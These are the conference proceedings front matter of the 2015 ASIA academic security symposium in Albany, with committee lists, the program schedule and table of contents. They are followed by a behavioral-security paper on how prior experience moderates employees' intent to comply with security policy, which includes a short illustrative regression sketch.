
Academic Track of 18th Annual NYS Cyber Security Conference

Empire State Plaza Albany, NY, USA

June 2-3, 2015

10th Annual Symposium on

Information Assurance (ASIA ’15)

General ASIA Chair:

Sanjay Goel

Information Technology Management, School of Business

University at Albany, State University of New York

conference proceedings

This volume is published as a collective work. Rights to individual papers remain with the author or the author’s employer.

Permission is granted for the noncommercial reproduction of the complete work for educational or research purposes.

Proceedings of the 10th Annual Symposium on Information Assurance (ASIA ’15)

Academic track of the 18th Annual 2015 NYS Cyber Security Conference held on June 2-3, 2015, Albany, NY, USA.

Organizing Committee

Sanjay Goel, General Chair: Director, FACETS & Director of Research, NYS Center for Information Forensics and Assurance; Chair & Associate Professor, Information Technology Management, School of Business, University at Albany, SUNY

Yuan Hong, Review Co-chair: Assistant Professor, Digital Forensics Program, School of Business, University at Albany, SUNY

Justin Giboney, Review Co-chair: Assistant Professor, Digital Forensics Program, School of Business, University at Albany, SUNY

Peter Stephenson, ASIA ’15 Chair: Professor, School of Business, Norwich University

Damira Pon, Publicity Chair: Faculty, Digital Forensics Program, School of Criminal Justice / School of Business, University at Albany, SUNY

Fabio R. Auffant II, Tutorial Chair: Lecturer, Digital Forensics Program, School of Business, University at Albany, SUNY

Karen Sorady, Organization Chair: Manager, Governance, Risk and Compliance, EISO

Ersin Dincelli, Proceedings Chair: Research Analyst, NYS Center for Information Forensics and Assurance, University at Albany, SUNY

Advisory Committee

Gurpreet Dhillon, VCU

Merrill Warkentin, Mississippi State

Nasir Memon, NYU Polytechnic

Bhavani Thuraisingham, UT Dallas

H. Raghav Rao, UBuffalo, SUNY

Technical Program Committee

Amir Masoumzadeh, University at Albany, SUNY
Anil B. Somayaji, Carleton University, Canada
Anyi Liu, Indiana University - Purdue University Fort Wayne (IPFW)
Ben Shao, Arizona State University
Bill Stackpole, RIT
Boleslaw Szymanski, RPI
Bradley Malin, Vanderbilt University
Brian Nussbaum, University at Albany, SUNY
Corey Schou, Idaho State University
Daryl Johnson, RIT
Feng Chen, University at Albany, SUNY
Gary C. Kessler, Embry-Riddle Aeronautical University
Gaurav Bansal, University of Wisconsin
George Berg, University at Albany, SUNY
George Markowsky, University of Maine
Hoang Pham, Rutgers University
Hong C. Li, Intel Corporation
Jim Hoag, Champlain University
Jingguo Wang, UT at Arlington
Kathy A. Enget, University at Albany, SUNY
Kevin J. Williams, University at Albany, SUNY
Leon Reznik, RIT
Linda Markowsky, University of Maine
M.P. Gupta, Indian Institute of Technology, Delhi
Manish Gupta, M&T Bank
Mark Scanlon, University College Dublin
Martin Loeb, University of Maryland
Michael Oehler, Government Mitigation
Mohan Kankanhalli, National University of Singapore
Murtuza Jadliwala, Wichita State University
Nan Zhang, George Washington University
Neetesh Saxena, SUNY Korea & Stony Brook University
Pavel Gladyshev, University College Dublin
Pradeep K. Atrey, University at Albany, SUNY
Raj Sharman, University at Buffalo, SUNY
Shambhu Upadhyaya, University at Buffalo, SUNY
Shiu-Kai Chin, Syracuse University
Siwei Lyu, University at Albany, SUNY
Tae Oh, RIT
Tejaswini Herath, Brock University
W. Art Chaovalitwongse, University of Washington
Xuelian Long, Facebook

ASIA DINNER SPONSOR · NYSCSC TERABYTE SPONSOR · NYSCSC MEGABYTE SPONSOR · NYSCSC KILOBYTE SPONSORS


MESSAGE FROM ASIA GENERAL CHAIR

Welcome to the 10th Annual Symposium on Information Assurance (ASIA’15)! This event complements

the NYS Cyber Security Conference as its academic track with a goal of increasing interaction among

practitioners and researchers to foster infusion of academic research into practice. For the last several years,

ASIA has been a great success with excellent papers and participation from academia, industry, and

government and well-attended sessions. This year, we again have an excellent set of papers, invited talks,

and keynote addresses. We have been able to attract excellent keynote speakers and some of the world's top information systems researchers to the conference.

I would like to thank the talented technical program committee that has supported the review process for

ASIA. In most cases, the papers were assigned to at least three reviewers, either members of the program committee or experts outside the committee, and reviewer assignments were checked to ensure there was no conflict of interest. I also personally read the papers and reviews and concurred with the reviewers' assessments. Our goal is to

keep the quality of submissions high as the symposium matures. There were multiple levels of quality

control – first with the reviewers, then with the program chair, and then with the general chair. The

committee serves a critical role in the success of the symposium and we are thankful for the participation

of each member.

I am grateful to the advisory committee members for their useful suggestions in managing the conference

and would like to thank our Program Chair, Peter Stephenson from Norwich University and our Review

Chairs, Yuan Hong and Justin Giboney from UAlbany in helping to manage the review process and setting

up an excellent program for ASIA. Fabio Auffant is our tutorial chair and we have three excellent tutorials

for this year’s conference. I would also like to thank our proceedings chair, Ersin Dincelli, who has worked

diligently on editorial review of the articles to ensure a high quality standard for our proceedings. Damira

Pon, the publicity chair, has done an excellent job in promoting the conference. Finally, we were fortunate

to have extremely dedicated partners in the Enterprise Information Security Office (EISO). Karen Sorady,

our organization chair, represents the EISO on our board and has been instrumental in planning the

conference.

The conference is organized in partnership with the NYS Office of Information Technology Services; the NYS Forum; and the University at Albany, State

University of New York (UAlbany). Our partners have managed the logistics for the conference, allowing

us to focus on the program management. We would like to thank the conference terabyte sponsor AT&T,

the conference megabyte sponsor CISCO, the conference kilobyte sponsors ePlus Technologies, Presidio,

Tanium, Symantec, and the symposium dinner sponsor – the University at Albany’s School of Business for

providing financial support for the symposium.

Most importantly, I would like to thank the authors for taking the time to prepare high quality manuscripts

and respecting the deadlines imposed on them, allowing us sufficient time for reviews and publication.

I hope that you enjoy the symposium and continue to participate in the future. In each of the subsequent

years, we plan to have different themes in security-related areas. We also plan to hold the symposium next

year. If you would like to propose a track or partner on a future symposium, please let us know. The call

for papers for next year’s symposium will be distributed in the fall and we hope to see you again in 2016.

Sanjay Goel, ASIA General Chair

Director of FACETS & Director of Research, NYS Center for Information Forensics and Assurance

Associate Professor & Chair, Information Technology Management Department, School of Business


10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA ’15)

DAY 1: Tuesday, June 2, 2015 (8:00am – 4:15pm)

REGISTRATION & VISIT EXHIBITORS – Base of the Egg (8:00 – 9:00am)

KEYNOTE (9:00 – 10:30am)

Welcome Address: Deborah Snyder, Information Technology Services

ASIA Welcome Remarks: James Stellar, Provost, University at Albany, SUNY, NY

Keynote: “Cyber Security End-to-End: What Each of Us Can Do Now” Jane Holl Lute, CEO of the Center for

Internet Security

BREAK / VISIT EXHIBITORS – Base of the Egg (10:30 – 11:00am)

Terabyte Sponsor Demo – AT&T (10:35 – 10:55am)

SYMPOSIUM SESSION 1: Behavioral Security (11:00 – 11:50am) Chair: Damira Pon, University at Albany, SUNY, NY

Paper: How Direct and Vicarious Experience Promotes Security Hygiene

Leigh A. Mutchler, University of Tennessee and Merrill Warkentin, Mississippi State University

Paper: Two Studies on Password Memorability and Perception

Delbert Hart, SUNY Plattsburgh

LUNCH / VISIT EXHIBITORS – Base of the Egg (11:50am – 1:00pm)

SYMPOSIUM SESSION 2: Service Security (1:00 – 1:50pm) Chair: Justin Giboney, University at Albany, SUNY, NY

Paper: A Holistic Approach for Service Migration Decision, Strategy and Scheduling
Yanjun Zuo, University of North Dakota, ND

Invited Talk: Post-audit of Service Security Investment: Using Simulation Approach
Hemantha S. B. Herath and Tejaswini C. Herath, Brock University, Canada

BREAK / VISIT EXHIBITORS – Base of the Egg (1:50 – 2:10pm)

Megabyte Sponsor Demo – Cisco (1:55 – 2:05pm)

SYMPOSIUM SESSION 3: Cyber Attacks (2:10 – 3:00pm) Chair: Victoria Kisekka, University at Buffalo, SUNY, NY

Paper: Crowdsourcing Computer Security Attack Trees

Matthew Tentilucci, Nick Roberts, Shreshth Kandari, Daryl Johnson, Dan Bogaard, Bill Stackpole; Rochester

Institute of Technology, NY, and George Markowsky, University of Maine, ME

Paper: A Covert Channel in the Worldwide Public Switched Telephone Network Dial Plan
Bryan Harmat, Jared Stroud, and Daryl Johnson, Rochester Institute of Technology, NY

BREAK / VISIT EXHIBITORS – Base of the Egg (3:00 – 3:20pm)

SYMPOSIUM SESSION 4: International Security Cooperation & Cyber Warfare (3:20 – 4:15pm) Chair: Sanjay Goel, University at Albany, SUNY, NY

Paper: International Cooperation to Enhance Website Security

Manmohan Chaturvedi, CISO Academy, India and Srishti Gupta, VIT University, India

Invited Talk: Information Sharing to Manage Cyber Incidents: Deluged with Data Yet Starving for

Timely Critical Data

Sanjay Goel, University at Albany, SUNY, NY and Charles Barry, National Defense University, Washington, DC

END OF DAY 1


10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA ’15)

DAY 2: Wednesday, June 3, 2015 (8:00am – 3:45pm)

REGISTRATION / VISIT EXHIBITORS – Base of Egg (8:00 – 8:30am)

KEYNOTE (8:30 – 10:00am)

Introduction and ASIA Welcome: Sanjay Goel, ASIA General Chair

School of Business, University at Albany, State University of New York

Keynote: “Whose Job is it to Solve the Cybersecurity Problem?” Bruce McConnell, EastWest Institute, NY

BREAK / VISIT THE EXHIBITORS – Base of the Egg (10:00 – 10:30am)

Terabyte Sponsor Demo – AT&T (10:05 – 10:25am)

SYMPOSIUM SESSION 5: Digital Forensics (10:30 – 11:20am) Chair: Fabio Auffant, University at Albany, SUNY, NY

Paper: Shot Segmentation and Grouping for PTZ Camera Videos
Andrew Pulver, University at Albany, SUNY, NY, Ming-Ching Chang, GE Global Research, NY, and Siwei Lyu,

University at Albany, SUNY, NY

Invited Talk: Securing against Malicious Hardware Trojans

Sanjay Goel, University at Albany, SUNY, NY, John G. Hartley, Colleges of Nanoscale Science and Engineering,

SUNY, and Yuan Hong, University at Albany, SUNY, NY

BREAK / VISIT THE EXHIBITORS – Base of the Egg (11:20 – 11:40am)

Megabyte Sponsor Demo – Cisco (11:25 – 11:35am)

SYMPOSIUM SESSION 6: Cloud Computing and Internet of Things (11:40 – 12:30pm) Chair: Yuan Hong, University at Albany, SUNY, NY

Paper: Secure Audio Reverberation over Cloud

M. Abukari Yakubu, University of Winnipeg, Canada, Pradeep K. Atrey, University at Albany, SUNY, NY, and

Namunu C. Maddage, University of Melbourne, Australia

Paper: Using Features of Cloud Computing to Defend Smart Grid against DDoS Attacks

Anthony Califano, Ersin Dincelli, and Sanjay Goel, University at Albany, SUNY, NY

LUNCH / VISIT THE EXHIBITORS – Base of the Egg (12:30 – 1:40pm)

SYMPOSIUM SESSION 7: Disasters and Incident Response (1:40 – 2:30pm) Chair: Pradeep Atrey, University at Albany, SUNY, NY

Paper: Trust Management in Resource Constraint Networks
Thomas A. Babbitt and Boleslaw Szymanski, Rensselaer Polytechnic Institute, NY

Paper: Investigating Information Security Effectiveness after an Extreme Event

Victoria Kisekka, University at Buffalo, NY

BREAK / VISIT THE EXHIBITORS – Base of the Egg (2:30 – 2:50pm)

SYMPOSIUM SESSION 8: Network Security (2:50 – 3:45pm) Chair: George Berg, University at Albany, SUNY, NY

Paper: A Layer 2 Protocol to Protect the IP Communication in a Wired Ethernet Network
Reiner Campillo, Ministry of Higher Education, Science and Technology, Dominican Republic and Tae Oh,

Rochester Institute of Technology, NY

Paper: Proposed Terminal Device for End-to-End Secure SMS in Cellular Networks

Neetesh Saxena, SUNY, Korea / Stony Brook University, NY and Narendra S Chaudhari, Visvesvaraya National

Institute of Technology / Indian Institute of Technology Indore

CLOSING REMARKS (3:45 – 4:00pm) Sanjay Goel, General Chair


TABLE OF CONTENTS

Day 1 Keynote

Cyber Security End-to-End: What Each of Us Can Do Now .......................................... 1
Jane Holl Lute, CEO of the Center for Internet Security

Session 1: Behavioral Security

How Direct and Vicarious Experience Promotes Security Hygiene .............................. 2
Leigh A. Mutchler, University of Tennessee and Merrill Warkentin, Mississippi State University

Two Studies on Password Memorability and Perception .............................................. 7
Delbert Hart, SUNY Plattsburgh

Session 2: Service Security

A Holistic Approach for Service Migration Decision, Strategy and Scheduling ........... 14
Yanjun Zuo, University of North Dakota, ND

Invited Talk: Post-audit of Service Security Investment: Using Simulation Approach .. 18
Hemantha Herath and Tejaswini Herath, Brock University, Canada

Session 3: Cyber Attacks

Crowdsourcing Computer Security Attack Trees .......................................................... 19
Matt Tentilucci, Nick Roberts, Shreshth Kandari, Daryl Johnson, Dan Bogaard, Bill Stackpole, Rochester Institute of Technology, NY, and George Markowsky, University of Maine, ME

A Covert Channel in the Worldwide Public Switched Telephone Network Dial Plan .... 24
Bryan Harmat, Jared Stroud, and Daryl Johnson, Rochester Institute of Technology, NY

Session 4: International Security Cooperation & Cyber Warfare

International Cooperation to Enhance Website Security ............................................... 28
Manmohan Chaturvedi, CISO Academy, India and Srishti Gupta, VIT University, India

Invited Talk: Information Sharing to Manage Cyber Incidents: Deluged with Data Yet Starving for Timely Critical Data .................................................................................. 32
Sanjay Goel, University at Albany, SUNY, NY and Charles Barry, National Defense University, Washington, DC

Day 2 Keynote

Whose Job is it to Solve the Cybersecurity Problem? .................................................... 33
Bruce McConnell, Senior Vice President of the EastWest Institute, NY

Session 5: Digital Forensics

Shot Segmentation and Grouping for PTZ Camera Videos ........................................... 34
Andrew Pulver, University at Albany, SUNY, NY, Ming-Ching Chang, GE Global Research, NY, and Siwei Lyu, University at Albany, SUNY, NY

Invited Talk: Securing against Malicious Hardware Trojans ........................................ 38
Sanjay Goel, University at Albany, SUNY, NY, John G. Hartley, Colleges of Nanoscale Science and Engineering, SUNY, and Yuan Hong, University at Albany, SUNY, NY

Session 6: Cloud Computing and Internet of Things

Secure Audio Reverberation over Cloud ....................................................................... 39
M. Abukari Yakubu, University of Winnipeg, Canada, Pradeep K. Atrey, University at Albany, SUNY, NY, and Namunu C. Maddage, University of Melbourne, Australia

Using Features of Cloud Computing to Defend Smart Grid against DDoS Attacks ...... 44
Anthony Califano, Ersin Dincelli, and Sanjay Goel, University at Albany, SUNY, NY

Session 7: Disasters and Incident Response

Trust Management in Resource Constraint Networks ................................................... 51
Thomas A. Babbitt and Boleslaw Szymanski, Rensselaer Polytechnic Institute, NY

Investigating Information Security Effectiveness after an Extreme Event .................... 57
Victoria Kisekka, University at Buffalo, NY

Session 8: Network Security

A Layer 2 Protocol to Protect the IP Communication in a Wired Ethernet Network ..... 60
Reiner Campillo, Ministry of Higher Education, Science and Technology, Dominican Republic and Tae Oh, Rochester Institute of Technology, NY

Proposed Terminal Device for End-to-End Secure SMS in Cellular Networks ............. 67
Neetesh Saxena, SUNY Korea / Stony Brook University, NY and Narendra S. Chaudhari, Visvesvaraya National Institute of Technology / Indian Institute of Technology Indore

Author Biographies ........................................................................................................ 73

Index of Authors ............................................................................................................ 81

Cyber Security End-to-End:

What Each of Us Can Do Now

Jane Holl Lute, Chief Executive Officer of the Center for Internet Security

Jane Holl Lute, Chief Executive Officer of the Center for Internet Security, will present an engaging keynote that dispels the myth that cyberspace is the "Wild Wild West," presenting it instead as an environment over which we can exert significant influence. She

will challenge the audience to see the powerful role each individual plays in our collective cybersecurity ecosystem, and to

understand that improving cybersecurity is within our reach. Ms. Lute will discuss how the adoption of foundational cyber

hygiene measures will result in immediate and measurable protections against the vast majority of cyber attacks and incidents.

BIOGRAPHY

Ms. Lute serves as Chief Executive Officer (CEO) of the Center for Internet Security (CIS), an international nonprofit

organization focused on enhancing cybersecurity readiness and response for the public and private sectors. Ms. Lute most

recently served as the President and Chief Executive Officer of the Council on CyberSecurity, an independent, expert

organization dedicated to the security of an open Internet. Prior to joining CIS, Ms. Lute served as Deputy Secretary for the

Department of Homeland Security (DHS). As the DHS chief operating officer, Ms. Lute was responsible for the day-to-day

management of the Department's efforts to prevent terrorism and enhance security, secure and manage the nation's borders,

administer and enforce U.S. immigration laws, strengthen national resilience in the face of disasters, and ensure the nation's

cybersecurity.

From 2003-2009, Ms. Lute served as Assistant Secretary-General of the United Nations (UN) and established the

Department of Field Support, responsible for comprehensive on-the-ground support to UN peace operations worldwide,

including rapid-response efforts in support of development and humanitarian operations and crises. Ms. Lute also served as

Assistant Secretary-General for Peacebuilding, responsible for coordinating efforts on behalf of the Secretary General to build

sustainable peace in countries emerging from violent conflict.

Prior to joining the UN, Ms. Lute was Executive Vice-President and Chief Operating Officer of the United Nations

Foundation and the Better World Fund. From 1994-2000, she worked with David A. Hamburg, former president of the

Carnegie Corporation of New York, and Cyrus Vance, former U.S. Secretary of State, on the Carnegie Commission on

Preventing Deadly Conflict, a global initiative that pioneered the cause of conflict prevention.

Ms. Lute served on the National Security Council staff under both President George H.W. Bush and President William

Jefferson Clinton and had a distinguished career in the United States Army, including service in the Gulf during Operation

Desert Storm. She has a Ph.D. in political science from Stanford University and a J.D. from Georgetown University.


10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY


How Direct and Vicarious Experience

Promotes Security Hygiene

Leigh A. Mutchler

Accounting and Information Management

University of Tennessee

Knoxville, TN, USA

[email protected]

Merrill Warkentin

Management and Information Systems

Mississippi State University

Mississippi State, MS, USA

[email protected]

Abstract—This conference proceedings paper presents part of

a larger study that is being prepared for publication in an

academic journal. Elements are withheld from the printed

version, but will be presented at the conference in Albany.

Readers may contact the authors for more information.

Keywords—computer security hygiene; security behaviors;

compliance; direct experience; vicarious experience; SETA

programs; protection motivation; PMT; threat; response; social

influence; self-efficacy

I. INTRODUCTION

Information Systems (IS) security practitioners continually struggle to keep abreast of the numerous information security threats that face modern organizations. For example, 2014 saw a 40% increase in attacks on large companies, including the attacks on Sony, Home Depot, JP Morgan, Uber, and Premera Blue Cross [1-4]. That same year also set a record for the number of zero-day vulnerabilities, such as the "Heartbleed" bug [4-6]. Even the good news of 2014 was overshadowed by bad news: a report released by Proofpoint [7] found that while security awareness programs contributed to a 94% decrease in the success rate of phishing attacks, attackers quickly responded with modified attack approaches directed toward new targets.

Security threats to an organization come in all shapes and sizes [8, 9], requiring the implementation of both technical and behavioral controls. The policies and procedures regarding expected secure behaviors are documented in the information security policy (ISP). Employees have knowledge of and access to organizational data and systems, and as such are potential "insider threats," which in turn makes ensuring their compliance with the ISP particularly complex [10-16]. Employee noncompliance with the ISP often results in unintentional threats to the organization. For example, employees who forget to consistently comply with a clean desk policy put corporate information at risk, but the risk is accidental. Employees may not fully understand proper data backup procedures, which creates a risk of data loss, but again this risk is not deliberate. Errors, misunderstandings, and poor judgment will always exist in the workplace, and instructional programs are the typical control applied to protect against unwanted employee behaviors and to encourage ISP compliance.

The instructional program often favored by organizations to ensure employees comply with the ISP is the Security

Education, Training, and Awareness (SETA) program [11, 17-19]. The SETA program consists of three levels as summarized in Table 1. The awareness level of SETA instruction is the primary level of interest in this study because it is provided to all employees. Awareness is intended to supply employees with the foundation of information security knowledge necessary to act in a secure manner as they fulfill their job duties. The training level is typically directed toward managers and expands the awareness instruction with a skills component that is anticipated to better prepare supervisory employees to assist subordinate employees. The education level is beyond the scope of this study as it is typically restricted to the IS professionals of an organization.

Awareness instruction is generally delivered using a classroom or a self-paced online learning model [19-22]. Awareness often focuses on repetition of the information to keep employees “aware” of the ever-present security issues. Awareness programs are often reported to be ineffective [10, 23] and are argued by some to be a waste of organizational resources [24]. So what is missing – why isn’t awareness enough?

TABLE I. BEHAVIORAL CONTROL - SECURITY INSTRUCTION

SETA Instruction Levels [adapted from 20]

                     EDUCATION                TRAINING                        AWARENESS
Attribute:           "Why"                    "How"                           "What"
Level:               Insight                  Knowledge                       Information
Learning Objective:  Understanding            Skill                           Recognition and Retention
Teaching Method:     Theoretical Instruction  Practical Instruction           Informational Instruction
Employee:            IS Professionals         IS Management, Non-IS           All
                                              Supervisors, Non-IS Managers
Impact Timeframe:    Long-term                Intermediate                    Short-term

Awareness instruction content should be delivered at a basic level to better ensure that all employees, regardless of their backgrounds, will be able to understand how to behave in a secure manner. However, a gap often remains between understanding the instruction provided and performing the secure behaviors [25]. Experience may be a key component in closing the gap between instruction and behavior. Take, for example, social engineering, which includes phishing and for which instruction is the undisputed primary defense. Chris Hadnagy, a social engineering expert


[26] recommends adding direct experience to an instruction program because it can greatly improve the outcomes of instruction. He states that phishing awareness instruction combined with the direct experience of an internally controlled phishing ruse is more effective and has been shown to drop the future success rate of phishing attacks by more than 75% [27]. For similar reasons, numerous penetration testers are taking advantage of controlled attacks to enhance network staff security instruction with the direct experience of a hack [28]. These cases where information security instruction is enhanced by direct experience lead to the following research question explored in this study:

What role does an individual’s previous experience with information security play in the individual’s secure behavioral intent?

The exploration performed in this study included a collection of data through an online survey. Fear appeals and the Protection Motivation Theory (PMT) [29] along with SETA instruction provided the framework for the measures. The goals included gaining a better understanding of the role that experience plays in the behavioral intent to perform secure actions. The presentation of this study continues with a discussion of the background, the model and method, the results, and the conclusions along with insights for future research.

II. BACKGROUND AND THEORETICAL SUPPORT

Awareness instruction is a persuasive organizational campaign [30-32] with the goal to successfully instruct and encourage employees to perform preferred secure behaviors. The Protection Motivation Theory (PMT) [29, 33] explains that a fear appeal provides information to an individual about a significant threat that is likely to occur, and about an effective response against the threat that can easily be performed by the individual. Fear appeals are messages framed to incite individual concerns and the goal is to persuade the individuals to perform certain behaviors, which fits well within the context of information security instruction. The PMT process model is illustrated in Fig. 1, which shows that an individual will assess the fear appeal information, along with information related to personal experience and other personality characteristics, in order to choose a behavioral response. It is not surprising that an increasing number of researchers, including those of this study, have explored the fit of the fear appeal and PMT within the context of information security.

Behavioral research within the context of information security makes up an important part of the research being performed in the field of IS today [14, 36-38]. Individual behaviors, including employee compliance with the ISP, are complex and difficult to predict. An employee's compliance with the ISP is ultimately a choice; organizations therefore need to encourage employees to choose to comply. Human characteristics such as attitudes and beliefs are known to influence choice, and both are known to be influenced by experience [39-41]. An individual's experiences are known to be strong predictors of the acceptance and use of information technology [42, 43], and interaction with information technologies is frequently necessary to comply with procedures documented in the ISP; therefore experience

plays a part in the employee’s ISP compliance. New employees gain experiences vicariously through observation, and these experiences teach them about the expected behaviors, including how to comply with the ISP [44]. Differing levels of experience with information security threats and responses will affect an employee’s choices, technology usage, and ultimately their ISP compliance and should therefore be taken into account when developing information security instructional programs. The SETA program, particularly the awareness level of instruction, is the primary mechanism used by organizations to encourage employee compliance with the ISP. The fear appeal, supported by PMT, provides an appropriate framework for awareness instruction, but an employee’s experience should also be taken into account. In this study, the individual direct and vicarious experiences with information security threats and with responses are examined to gain an understanding of the role experience plays with ISP compliance and to determine whether taking into consideration an employee’s experience may benefit information security awareness programs.

III. RESEARCH MODEL AND HYPOTHESES DEVELOPMENT

A fear appeal is a persuasive message that is much like the messages included in awareness instruction programs. Both provide information regarding threats that are severe and likely to occur. Both also provide information regarding recommended responses that work, are not difficult to perform, and do not incur costs that outweigh the benefits of performing the protective response [33, 35, 45]. A fear appeal and its measures are, therefore, appropriate for this study. The fear appeal core constructs included are threat severity (TSV), threat susceptibility (TSU), response efficacy (REF), self-efficacy (SEF), and response cost (RSC). Additionally, social influence (SOC) is included because of the strong influence others can exert on an individual's behavior choices [40], including those regarding the use of technology [42, 46] and the intent to perform secure behaviors [47-52], all of which are relevant to this study.

Fig. 1. Protection Motivation Theory Schema [adapted from 34,35]

Experience is contextual, and in the context of information security an individual will have varying levels of experience with threats and with recommended responses. Experience may also be decomposed into direct and vicarious components, and in an exploratory study such as this, examining the components separately provides the richer understanding desired. A separate analysis of the direct and vicarious components of experience is further supported by the PMT process model. Therefore, four elements of experience

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 3

including direct and vicarious threat experience and direct and vicarious response experience, are explored in this study.

The objective of this study is to explore the impact of an individual’s prior experience on the relationships between the traditional PMT variables and the individual’s security hygiene, as represented by his or her behavioral intent to engage in secure behavior. Experience is a known source of influence on the antecedents of behavioral intent, and in the context of this study that influence is proposed to be one of moderation. Due to the exploratory nature of this study, tests for moderation by the experience components, direct threat experience (DTE), direct response experience (DRE), vicarious threat experience (VTE), and vicarious response experience (VRE), were conducted on each of the relationships between the core fear appeal constructs and the dependent variable behavioral intent (BEH). The research model in Fig. 2 illustrates these predictions. Hypothesis 1a predicts a moderating influence by DTE on the relationship between TSU and BEH; hypothesis 1b predicts a moderating influence by DRE on the same relationship; hypothesis 1c predicts a moderating influence by VTE; and hypothesis 1d predicts a moderating influence by VRE.

H1a-d: The relationship between an individual’s perception of threat susceptibility and their reported behavioral intent will be moderated by at least one of the components of experience: direct threat, direct response, vicarious threat, and vicarious response.

Similarly, hypotheses 2 through 6 predict moderating influences by each of the experience components, DTE, DRE, VTE, and VRE, on the relationships between BEH and the remaining constructs, TSV, REF, SEF, RSC, and SOC, as follows:

H2a-d: The relationship between an individual’s perception of threat severity and their reported behavioral intent will be moderated by direct threat, direct response, vicarious threat, and/or vicarious response.

H3a-d: The relationship between an individual’s perception of response efficacy and their reported behavioral intent will be moderated by direct threat, direct response, vicarious threat, and/or vicarious response.

H4a-d: The relationship between an individual’s perception of self-efficacy and their reported behavioral intent will be moderated by direct threat, direct response, vicarious threat, and/or vicarious response.

H5a-d: The relationship between an individual’s perception of response cost and their reported behavioral intent will be moderated by direct threat, direct response, vicarious threat, and/or vicarious response.

H6a-d: The relationship between an individual’s perception of social influence and their reported behavioral intent will be moderated by direct threat, direct response, vicarious threat, and/or vicarious response.
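Moderation of the kind hypothesized above is conventionally tested by adding a product (interaction) term to the regression of behavioral intent on the predictor. The paper does not specify its analysis code, so the following is only an illustrative sketch on synthetic data, with variable names borrowed from the study's constructs:

```python
import numpy as np

rng = np.random.default_rng(0)
n = 200

# Synthetic stand-ins: TSU = perceived threat susceptibility,
# DTE = direct threat experience, BEH = behavioral intent.
tsu = rng.normal(size=n)
dte = rng.normal(size=n)
# Simulate a true moderating effect of 0.4 on the TSU-BEH relationship.
beh = 0.5 * tsu + 0.3 * dte + 0.4 * tsu * dte + rng.normal(scale=0.5, size=n)

# OLS with an interaction term: BEH ~ TSU + DTE + TSU*DTE.
X = np.column_stack([np.ones(n), tsu, dte, tsu * dte])
coef, *_ = np.linalg.lstsq(X, beh, rcond=None)

# A nonzero coefficient on the product term indicates moderation:
# the TSU-BEH slope depends on the level of DTE.
print(coef[3])  # close to the simulated interaction effect of 0.4
```

In practice one would also test the significance of the interaction coefficient; the sketch only shows the structural form of a moderation test.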

IV. RESEARCH METHOD AND DATA ANALYSIS

(Note: Details of the research design, data collection, and data analysis will be presented at the conference.)

Fig. 2. Research Model with Hypothesized Moderating Relationships

V. DISCUSSION

Our analysis, which will be presented at the conference, suggests significant interactions by at least one experience variable on each of the relationships between the predictors TSU, TSV, REF, SEF, RSC, and SOC and the dependent variable BEH. Direct threat, vicarious threat, and vicarious response experiences were found to act as moderators in more than one relationship, but none of the relationships tested in this study were found to be moderated by direct response experience. Findings and discussion will be presented in Albany.

VI. CONCLUSION

SETA information security instruction programs are intended to provide employees with an adequate level of instruction so they will be well equipped to comply with the ISP, yet employee compliance does not always result. This study proposed that a better understanding of the role of prior experience within this context may help to close the gap. Our analysis explored that proposition, and the test results indicate that experience does significantly interact with individual perceptions of threat susceptibility and severity and with perceptions of response efficacy, self-efficacy, response cost, and social influence. No evidence of moderation due to direct response experience was identified, but direct threat experience, vicarious threat experience, and vicarious response experience were each found to interact with at least one of the predictor variables, and each of the interactions positively affects the relationship between the predictor and behavioral intent, supporting this study’s proposition. Follow-up studies are planned to examine in more depth the predictive relationships between the fear appeal core constructs and behavioral intent, combined with examination of the moderations identified here, to better understand the value of this study’s findings and, ultimately, the role of experience within this context.


REFERENCES

[1] L. Div, (2015, Jan.), "Lessons from 2014 mega breaches: It's time to shift to a post-breach mindset," Forbes, [On-line], Available: http://www.forbes.com/sites/frontline/2015/01/07/lessons-from-2014-mega-breaches-its-time-to-shift-to-a-post-breach-mindset/, [May 9, 2015].

[2] D. Lewis, (2015, Feb.), "Uber suffers data breach affecting 50,000," Forbes, [On-line], Available: http://www.forbes.com/sites/davelewis/2015/02/28/uber-suffers-data-breach-affecting-50000/, [May 9, 2015].

[3] K. Vinton, (2015, Mar.), "Premera Blue Cross breach may have exposed 11 million customers' medical and financial data," Forbes, [On-line], Available: http://www.forbes.com/sites/katevinton/2015/03/17/11-million-customers-medical-and-financial-data-may-have-been-exposed-in-premera-blue-cross-breach/, [May 9, 2015].

[4] (2015, Apr.), “Internet security threat report vol. 20,” [On-line], Available: http://www.symantec.com/about/news/resources/press_kits/detail.jsp?pkid=istr-20, [May 13, 2015].

[5] (2015, Apr.), "Deceptive new tactics give advanced attackers free reign over corporate networks," InformationWeek, [On-line], Available: http://www.darkreading.com/endpoint/deceptive-new-tactics-give-advanced-attackers-free-reign-over-corporate-networks/d/d-id/1319942, [May 9, 2015].

[6] J. Johnson, (2015, Jan.), "If 2014 was the year of the data breach, brace for more," Forbes, [On-line], Available: http://www.forbes.com/sites/danielfisher/2015/01/02/if-2014-was-the-year-of-the-data-breach-brace-for-more/, [May 9, 2015].

[7] (2014, Sept.), “Managing cyber risks in an interconnected world: The global state of information security survey 2015,” [On-line], Available: http://www.pwc.com/gsiss2015, [May 13, 2015]

[8] (2015), “The human factor 2015: A Proofpoint research report,” [On-line], Available: https://www.proofpoint.com/, [May 9, 2015].

[9] K. D. Loch, H. H. Carr, and M. E. Warkentin, “Threats to Information Systems: Today's Reality, Yesterday's Understanding,” MIS Quarterly, vol. 16, no. 2, pp. 173-186, 1992.

[10] M. Warkentin, and L. A. Mutchler, "Behavioral Information Security Management," in Computing Handbook: Information Systems and Information Technology, T. Heikki and A. Tucker, eds., Boca Raton, FL: Taylor & Francis Group, 2014.

[11] M. A. Davis, (2012, May), “2012 strategic security survey,” InformationWeek, [On-line], Available: http://reports.informationweek.com/abstract/21/8807/Security/2012-Strategic-Security-Survey.html, [May 8, 2012].

[12] R. Willison, and M. Warkentin, “Beyond deterrence: An expanded view of employee computer abuse,” MIS Quarterly, vol. 37, no. 1, pp. 1-20, 2013.

[13] M. A. Sasse, S. Brostoff, and D. Weirich, “Transforming the 'weakest link' - a human/computer interaction approach to usable and effective security,” BT Technology Journal, vol. 19, no. 3, pp. 122-131, 2001.

